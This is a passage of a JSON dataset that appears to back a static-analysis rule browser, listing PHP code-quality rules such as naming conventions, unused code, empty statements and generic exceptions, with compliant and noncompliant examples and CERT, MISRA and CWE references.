$i++){\n echo(\"i = $i\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.4 - The goto statement shall not be used. <\/li>\n <li> MISRA C:2012, 15.1 - The goto statement should not be used <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"}],"language":"php","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks
BUG found Open
Open
window.data = {"total":112,"p":1,"ps":500,"rules":[{"key":"common-php:DuplicatedBlocks","repo":"common-php","name":"Source files should not have any duplicated blocks","htmlDesc":"An issue is created on a file as soon as there is at least one block of duplicated code on this file","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"common-php:FailedUnitTests","repo":"common-php","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"common-php:InsufficientCommentDensity","repo":"common-php","name":"Source files should have a sufficient density of comment lines","htmlDesc":"An issue is created on a file as soon as the density of comment lines on this file is less than the required threshold. The number of comment lines to be written in order to reach the required threshold is provided by each issue message.","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"minimumCommentDensity","defaultValue":"25","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:InsufficientLineCoverage","repo":"common-php","name":"Lines should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the line coverage on this file is less than the required threshold. It gives the number of lines to be covered in order to reach the required threshold.","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"minimumLineCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:SkippedUnitTests","repo":"common-php","name":"Skipped unit tests should be either removed or fixed","htmlDesc":"Skipped unit tests are considered as dead code. Either they should be activated again (and updated) or they should be removed.","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S100","repo":"php","name":"Function names should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all function names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[a-z][_a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nfunction DoSomething(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(){...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Methods with an <code>@inheritdoc<\/code> annotation, as well as magic methods (<code>__construct()<\/code>, <code>__destruct()<\/code>,\n<code>__call()<\/code>, <code>__callStatic()<\/code>, <code>__get()<\/code>, <code>__set()<\/code>, <code>__isset()<\/code>, <code>__unset()<\/code>,\n<code>__sleep()<\/code>, <code>__wakeup()<\/code>, <code>__toString()<\/code>, <code>__invoke()<\/code>, <code>__set_state()<\/code>,\n<code>__clone()<\/code>, <code>__debugInfo()<\/code>) are ignored.<\/p>\n<pre>\nfunction __construct(){...}\nfunction __destruct(){...}\n\n\/**\n * {@inheritdoc}\n *\/\nfunction myFunc(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the function names against","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S101","repo":"php","name":"Class names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all class\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass my_class {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the class names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S103","repo":"php","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"120","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S105","repo":"php","name":"Tabulation characters should not be used","htmlDesc":"<p>Developers should not need to configure the tab width of their text editors in order to be able to read source code.<\/p>\n<p>So the use of tabulation character must be banned.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1066","repo":"php","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n if (condition2) {\n ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1 && condition2) {\n ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1067","repo":"php","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&&<\/code>, <code>||<\/code> and <code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold value of 3<\/p>\n<pre>\nif ((($condition1 && $condition2) || ($condition3 && $condition4)) && $condition5) { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ( (my_first_condition() || my_second_condition()) && my_last_condition()) { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1068","repo":"php","name":"Unused \"private\" fields should be removed","htmlDesc":"<p>If a <code>private<\/code> field is declared but not used in the program, it can be considered dead code and should therefore be removed. This will\nimprove maintainability because developers will not wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass {\n private $foo = 4; \/\/foo is unused\n\n public function compute($a) {\n return $a * 4;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n\n public function compute($a) {\n return $a * 4;\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S107","repo":"php","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4, $param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"},{"key":"constructorMax","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S108","repo":"php","name":"Nested blocks of code should not be left empty","htmlDesc":"<p>Most of the time a block of code is empty when a piece of code is really missing. So such empty block must be either filled or removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i < 42; $i++){} \/\/ Empty on purpose or missing piece of code ?\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a block contains a comment, this block is not considered to be empty.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1105","repo":"php","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition)\n{\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (left and right curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1109","repo":"php","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition) {\n doSomething();}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1116","repo":"php","name":"Empty statements should be removed","htmlDesc":"<p>Empty statements, i.e. <code>;<\/code>, are usually introduced by mistake, for example because:<\/p>\n<ul>\n <li> It was meant to be replaced by an actual statement, but this was forgotten. <\/li>\n <li> There was a typo which lead the semicolon to be doubled, i.e. <code>;;<\/code>. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n ; \/\/ Noncompliant - was used as a kind of TODO marker\n}\n\nfunction doSomethingElse($p) {\n echo $p;; \/\/ Noncompliant - double ;\n}\n\nfor ($i = 1; $i <= 10; doSomething($i), $i++); \/\/ Noncompliant - Rarely, they are used on purpose as the body of a loop. It is a bad practice to have side-effects outside of the loop body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething() {}\n\nfunction doSomethingElse($p) {\n echo $p;\n\n for ($i = 1; $i <= 10; $i++) {\n doSomething($i);\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment provided that\n the first character following the null statement is a white-space character. <\/li>\n <li> MISRA C++:2008, 6-2-3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment, provided\n that the first character following the null statement is a white-space character. <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7gCTAw\">CERT, MSC51-J.<\/a> - Do not place a semicolon immediately following an if, for,\n or while condition <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/i4FtAg\">CERT, EXP15-C.<\/a> - Do not place a semicolon on the same line as an if, for,\n or while statement <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1117","repo":"php","name":"Local variables should not have the same name as class fields","htmlDesc":"<p>Shadowing fields with a local variable is a bad practice that reduces code readability: it makes it confusing to know whether the field or the\nvariable is being used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n public $myField;\n\n public function doSomething() {\n $myField = 0;\n ...\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/2ADEAw\">CERT, DCL51-J.<\/a> - Do not shadow or obscure identifiers in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S112","repo":"php","name":"Generic exceptions ErrorException, RuntimeException and Exception should not be thrown","htmlDesc":"<p>If you throw a general exception type, such as ErrorException, RuntimeException, or Exception in a library or framework, it forces consumers to\ncatch all exceptions, including unknown exceptions that they do not know how to handle.<\/p>\n<p>Instead, either throw a subtype that already exists in the Standard PHP Library, or create your own type that derives from Exception.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthrow new Exception(); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nthrow new InvalidArgumentException();\n\/\/ or\nthrow new UnexpectedValueException();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/397.html\">MITRE, CWE-397<\/a> - Declaration of Throws for Generic Exception <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/BoB3AQ\">CERT, ERR07-J.<\/a> - Do not throw RuntimeException, Exception, or Throwable\n <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1124","repo":"php","name":"Modifiers should be declared in the correct order","htmlDesc":"<p>The PSR2 standard recommends listing modifiers in the following order to improve the readability of PHP source code:<\/p>\n<ol>\n <li> final or abstract <\/li>\n <li> public or protected or private <\/li>\n <li> static <\/li>\n<\/ol>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstatic protected $foo;\n...\npublic static final function bar(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprotected static $foo;\n...\nfinal public static function bar(){...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1125","repo":"php","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($booleanVariable == true) { \/* ... *\/ }\nif ($booleanVariable != true) { \/* ... *\/ }\nif ($booleanVariable || false) { \/* ... *\/ }\ndoSomething(!false);\n\n$booleanVariable = condition ? true : exp;\n$booleanVariable = condition ? false : exp;\n$booleanVariable = condition ? exp : true;\n$booleanVariable = condition ? exp : false;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($booleanVariable) { \/* ... *\/ }\nif (!$booleanVariable) { \/* ... *\/ }\nif ($booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n\n$booleanVariable = condition || exp;\n$booleanVariable = !condition && exp;\n$booleanVariable = !condition || exp;\n$booleanVariable = condition && exp;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1126","repo":"php","name":"Return of boolean expressions should not be wrapped into an \"if-then-else\" statement","htmlDesc":"<p>Return of boolean literal statements wrapped into <code>if-then-else<\/code> ones should be simplified.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (expression) {\n return true;\n} else {\n return false;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn expression;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S113","repo":"php","name":"Files should contain an empty new line at the end","htmlDesc":"<p>Some tools such as Git work better when files end with an empty line.<\/p>\n<p>This rule simply generates an issue if it is missing.<\/p>\n<p>For example, a Git diff looks like this if the empty line is missing at the end of the file:<\/p>\n<pre>\n+class Test {\n+}\n\\ No newline at end of file\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1131","repo":"php","name":"Lines should not end with trailing whitespaces","htmlDesc":"<p>Trailing whitespaces are simply useless and should not stay in code. They may generate noise when comparing different versions of the same\nfile.<\/p>\n<p>If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the\nopportunity to do so. <\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1134","repo":"php","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide($numerator, $denominator) {\n return $numerator \/ $denominator; \/\/ FIXME denominator value might be 0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1135","repo":"php","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S114","repo":"php","name":"Interface names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all\ninterface names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\ninterface myInterface {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ninterface MyInterface {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the interface names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1142","repo":"php","name":"Functions should not contain too many return statements","htmlDesc":"<p>Having too many return statements in a function increases the function's essential complexity because the flow of execution is broken each time a\nreturn statement is encountered. This makes it harder to read and understand the logic of the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction myFunction(){ \/\/ Noncompliant as there are 4 return statements\n if (condition1) {\n return true;\n } else {\n if (condition2) {\n return false;\n } else {\n return true;\n }\n }\n return false;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed return statements per function","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1144","repo":"php","name":"Unused \"private\" methods should be removed","htmlDesc":"<p><code>private<\/code> methods that are never executed are dead code: unnecessary, inoperative code that should be removed. Cleaning out dead code\ndecreases the size of the maintained codebase, making it easier to understand the program and preventing bugs from being introduced.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n private function Foo() {} \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n public static function doSomething()\n {\n $foo = new Foo();\n ...\n }\n\n private function unusedPrivateFunction() { \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n private function Foo(){} \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n public static function doSomething()\n {\n $foo = new Foo();\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1145","repo":"php","name":"Useless \"if(true) {...}\" and \"if(false){...}\" blocks should be removed","htmlDesc":"<p><code>if<\/code> statements with conditions that are always false have the effect of making blocks of code non-functional. <code>if<\/code>\nstatements with conditions that are always true are completely redundant, and make the code less readable.<\/p>\n<p>There are three possible causes for the presence of such code: <\/p>\n<ul>\n <li> An if statement was changed during debugging and that debug code has been committed. <\/li>\n <li> Some value was left unset. <\/li>\n <li> Some logic is not doing what the programmer thought it did. <\/li>\n<\/ul>\n<p>In any of these cases, unconditional <code>if<\/code> statements should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (true) { \/\/ Noncompliant\n doSomething();\n}\n...\nif (false) { \/\/ Noncompliant\n doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomething();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571.html\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S115","repo":"php","name":"Constant names should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. This rule checks that all constant names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$<\/code>:<\/p>\n<pre>\ndefine(\"const1\", true);\n\nclass Foo {\n const const2 = \"bar\";\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndefine(\"CONST1\", true);\n\nclass Foo {\n const CONST2 = \"bar\";\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the constant names against.","defaultValue":"^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1151","repo":"php","name":"\"switch case\" clauses should not have too many lines","htmlDesc":"<p>The <code>switch<\/code> statement should be used only to clearly define some new branches in the control flow. As soon as a <code>case<\/code>\nclause contains too many statements this highly decreases the readability of the overall control flow statement. In such case, the content of the\n<code>case<\/code> clause should be extracted into a dedicated method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a threshold of 5:<\/p>\n<pre>\nswitch ($var) {\n case 0: \/\/ 6 lines till next case\n methodCall1();\n methodCall2();\n methodCall3();\n methodCall4();\n break;\n default:\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($var) {\n case 0:\n doSomething();\n break;\n default:\n break;\n}\n\nfunction doSomething(){\n methodCall1(\"\");\n methodCall2(\"\");\n methodCall3(\"\");\n methodCall4(\"\");\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of lines","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S116","repo":"php","name":"Field names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that field\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass MyClass {\n $my_field;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n $myField;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the field names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S117","repo":"php","name":"Local variable and function parameter names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all local\nvariable and function parameter names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\npublic function doSomething($my_param){\n $LOCAL;\n ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function doSomething($myParam){\n $local;\n ...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1172","repo":"php","name":"Unused function parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the value passed to such parameters is, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething($a, $b) { \/\/ \"$a\" is unused\n return compute($b);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($b) {\n return compute($b);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Functions in classes that override a class or implement interfaces are ignored.<\/p>\n<pre>\nclass C extends B {\n\n function doSomething($a, $b) { \/\/ no issue reported on $b\n compute($a);\n }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. <\/li>\n <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1185","repo":"php","name":"Overriding methods should do more than simply call the same method in the super class","htmlDesc":"<p>Overriding a method just to call the same method from the super class without performing any other actions is useless and misleading. The only time\nthis is justified is in <code>final<\/code> overriding methods, where the effect is to lock in the parent class behavior. This rule ignores such\noverrides of <code>equals<\/code>, <code>hashCode<\/code> and <code>toString<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Child extends Parent {\n\n public function func($n,$m) {\n parent::func($n$m); \/\/ Noncompliant\n }\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Child extends Parent {\n\n public function func($n,$m) {\n parent::func($n$m);\n \/\/ do additional things...\n }\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nclass Child extends Parent {\n \/\/ function eliminated\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1192","repo":"php","name":"String literals should not be duplicated","htmlDesc":"<p>Duplicated string literals make the process of refactoring error-prone, since you must be sure to update all occurrences.<\/p>\n<p>On the other hand, constants can be referenced from many places, but only need to be updated in a single place.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction run() {\n prepare('action1'); \/\/ Non-Compliant - 'action1' is duplicated 3 times\n execute('action1');\n release('action1');\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nACTION_1 = 'action1';\n\nfunction run() {\n prepare(ACTION_1);\n execute(ACTION_1);\n release(ACTION_1);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>To prevent generating some false-positives, literals having less than 5 characters are excluded.<\/p>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"threshold","htmlDesc":"Number of times a literal must be duplicated to trigger an issue","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1200","repo":"php","name":"Classes should not be coupled to too many other classes (Single Responsibility Principle)","htmlDesc":"<p>According to the Single Responsibility Principle, introduced by Robert C. Martin in his book \"Principles of Object Oriented Design\", a class should\nhave only one responsibility:<\/p>\n<blockquote>\n <p>If a class has more than one responsibility, then the responsibilities become coupled.<\/p>\n <p>Changes to one responsibility may impair or inhibit the class' ability to meet the others.<\/p>\n <p>This kind of coupling leads to fragile designs that break in unexpected ways when changed.<\/p>\n<\/blockquote>\n<p>Classes which rely on many other classes tend to aggregate too many responsibilities and should be split into several smaller ones.<\/p>\n<p>Nested classes dependencies are not counted as dependencies of the outer class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n class Foo { \/\/ Noncompliant - Foo depends on too many classes: T1, T2, T3, T4, T5, T6 and T7\n \/**\n * @var T1\n *\/\n public $a1; \/\/ 